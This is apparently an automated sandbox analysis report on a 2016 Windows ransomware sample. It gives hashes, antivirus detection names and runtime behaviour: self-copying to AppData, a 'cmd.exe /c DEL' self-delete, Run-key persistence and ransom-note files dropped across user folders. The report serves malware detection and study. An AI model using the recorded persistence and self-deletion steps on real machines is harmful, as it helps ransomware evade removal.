Analysis Date: 2016-02-11 04:46:09
MD5: 56897dbfc83e0ae0f4b7702350c0fdf1
SHA1: 780d4a09c1b60acf3961d04b7b3cfc9d8b89472f

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .coat: md5: 94e2f96f7a025201723af30a54119207 sha1: b83c17595631780eaf366681f8daa3920d5df160 size: 4608
Section .cbbl: md5: b1335f715a6e854ef93a5e13ad071c4b sha1: fd6d715b95d78f67a4c7be4f55c88ddbb2ec44be size: 141824
Section .rdata: md5: d819f1e206fa53c83eb08c3664c37cb6 sha1: d46485c980c04a4b60b0585fb44f656cc69bce53 size: 58880
Section .data: md5: 4c3bbcdce6832bb7694eb253dd4a0372 sha1: 6db4e37e5e3a49a88142e4cad8adb821596c1ce8 size: 37376
Section .rsrc: md5: 340bdaa4f9ce8979680588160e7aec1c sha1: 4f2e34082c391cc9fa06c8edde10707b557237d2 size: 187904
Timestamp: 2016-02-08 21:29:27
Packer: Microsoft Visual C++ ?.?
PEhash: c4d807657e295b692a8fe3947630c326f3f46a28
IMPhash: bd2a8f9ba380f160b10d2209983a6ae7
AV CA (E-Trust Ino): No Virus
AV Rising: No Virus
AV Mcafee: BackDoor-FDCH!56897DBFC83E
AV Avira (antivir): TR/Crypt.Xpack.445813
AV Twister: No Virus
AV Ad-Aware: Gen:Variant.Midie.7265
AV Alwil (avast): Win32:Malware-gen
AV Eset (nod32): Win32/Kryptik.ENJD
AV Grisoft (avg): Generic37.ALQJ
AV Symantec: Trojan.Cryptlock.N!g2
AV Fortinet: W32/Bitman.ENJD!tr
AV BitDefender: Gen:Variant.Midie.7265
AV K7: No Virus
AV Microsoft Security Essentials: No Virus
AV MicroWorld (escan): No Virus
AV MalwareBytes: Ransom.FileLocker
AV Authentium: W32/Rovnix.C.gen!Eldorado
AV Emsisoft: Gen:Variant.Midie.7265
AV Frisk (f-prot): No Virus
AV Ikarus: No Virus
AV Zillya!: No Virus
AV Kaspersky: Trojan-Ransom.Win32.Bitman.iah
AV Trend Micro: No Virus
AV VirusBlokAda (vba32): No Virus
AV CAT (quickheal): No Virus
AV BullGuard: No Virus
AV Arcabit (arcavir): Gen:Variant.Midie.7265
AV ClamAV: No Virus
AV Dr. Web: Trojan.Inject1.56622
AV F-Secure: Gen:Variant.Midie.7265

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\lviqbfe.exe
Creates Process: C:\WINDOWS\system32\cmd.exe /c DEL C:\780D4A~1.EXE
Creates Process: C:\Documents and Settings\Administrator\Application Data\lviqbfe.exe

Process
↳ C:\WINDOWS\system32\cmd.exe /c DEL C:\780D4A~1.EXE

Process
↳ C:\Documents and Settings\Administrator\Application Data\lviqbfe.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dsfgsdf-67897869 ➝ C:\Documents and Settings\Administrator\Application Data\lviqbfe.exe\\x00
Registry: HKEY_CURRENT_USER\Software\A9ECE4DAD0EB049\data ➝ NULL
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections ➝ 1
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\dsfgsdf-67897869 ➝ C:\Documents and Settings\Administrator\Application Data\lviqbfe.exe\\x00
Registry: HKEY_CURRENT_USER\Software\xxxsys\ID ➝ NULL
Creates File: C:\Documents and Settings\All Users\Documents\My Music\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Recent\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Application Data\Identities\{66520883-AF04-4437-A539-3E2F2944B956}\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\All Users\Documents\My Music\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Favorites\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\glob.js
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\All Users\Documents\My Music\My Playlists\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\brt\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\All Users\Documents\My Music\Sample Music\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\TypeSupport\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\All Users\Documents\My Pictures\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\Themes\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\0019E545\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\My Documents\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Application Data\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013052720130603\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Preferences\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\dd_netfx20UI3716.txt
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Security\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\MetaData\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\All Users\Documents\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\IMJP8_1\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Forms\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\PrintHood\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\MMC\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\My Documents\recover_file_txkgamkjj.txt
Creates File: PIPE\wkssvc
Creates File: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\udstore.js
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Application Data\Identities\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\JavaScripts\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\All Users\Documents\My Music\Sample Music\New Stories (Highway Blues).wma
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Security\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\SendTo\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\Content\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Forms\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Entertainment\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Cookies\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Winter.jpg
Creates File: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Color\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\All Users\Documents\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\All Users\Documents\My Music\Sample Music\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\Themes\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Preferences\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Water lilies.jpg
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Recent\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\All Users\Documents\My Music\My Playlists\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Start Menu\Programs\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Color\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\All Users\Documents\My Videos\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\brt\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Application Data\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\Themes\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\All Users\Documents\My Videos\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Entertainment\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Templates\winword.doc
Creates File: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\NetHood\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Application Data\Identities\{66520883-AF04-4437-A539-3E2F2944B956}\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\NetHood\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\IMJP8_1\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Accessibility\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Start Menu\Programs\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\NetHood\shared on Samba 3.6.9-151.el6 (192.168.1.1)\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\brt\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\NetHood\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Application Data\Identities\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\Install\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Security\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Application Data\Identities\{66520883-AF04-4437-A539-3E2F2944B956}\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CTLs\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Start Menu\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Local Settings\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Favorites\Links\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\My Documents\My Music\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\TypeSupport\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\MMC\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\brndlog.txt
Creates File: C:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Blue hills.jpg
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Favorites\Links\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Accessibility\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\Certificates\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\NetHood\shared on Samba 3.6.9-151.el6 (192.168.1.1)\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CTLs\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Start Menu\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\9.0\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\Search70\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\manifest.txt
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\Certificates\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CRLs\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\Content\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\MetaData\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013061320130614\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\My Documents\My Pictures\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\udlog.txt
Creates File: C:\Documents and Settings\Administrator\Application Data\AdobeUM\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Templates\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\glob.settings.js
Creates File: C:\Documents and Settings\Administrator\Templates\winword2.doc
Creates File: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_10.0.30319\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Application Data\Adobe\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Color\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\JavaScripts\glob.settings.js
Creates File: C:\Documents and Settings\Administrator\Favorites\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\TypeSupport\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\All Users\Documents\My Videos\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\9.0\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CRLs\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\Search70\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\My Documents\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\All Users\Documents\My Music\My Playlists\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\All Users\Documents\My Pictures\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Templates\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Local Settings\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Collab\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Application Data\AdobeUM\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Favorites\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Collab\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Favorites\Links\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\PrintHood\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Security\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\JavaScripts\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\All Users\Documents\My Music\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\SendTo\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Application Data\Identities\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_20130508_125854937-MSI_vc_red.msi.txt
Creates File: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\HELP_RECOVER_instructions+hec.html
